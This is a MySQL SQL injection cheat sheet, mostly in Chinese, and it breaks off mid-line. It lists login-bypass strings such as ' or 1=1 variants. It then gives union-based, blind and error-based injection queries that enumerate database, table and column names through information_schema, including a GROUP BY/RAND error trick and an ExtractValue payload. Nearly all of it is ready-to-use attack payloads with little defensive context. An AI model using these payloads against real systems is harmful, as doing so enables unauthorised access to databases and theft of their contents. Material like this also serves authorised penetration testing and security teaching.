’ or 1=1–
’ or 1=1#
’ or 1=1/*
') or ‘1’='1–
') or (‘1’='1–
注入语句备忘
数据库名
SELECT database();
SELECT schema_name FROM information_schema.schemata;
表名
- union 查询
–MySQL 4版本时用version=9,MySQL 5版本时用version=10
UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10; /* 列出当前数据库中的表 /
UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=database(); / 列出所有用户自定义数据库中的表 */
SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema!=‘information_schema’ AND table_schema!=‘mysql’;
- 盲注
AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > ‘A’
- 报错
AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));
– 在5.1.5版本中成功。
列名
- union 查询
UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = ‘tablename’
- 盲注
AND SELECT SUBS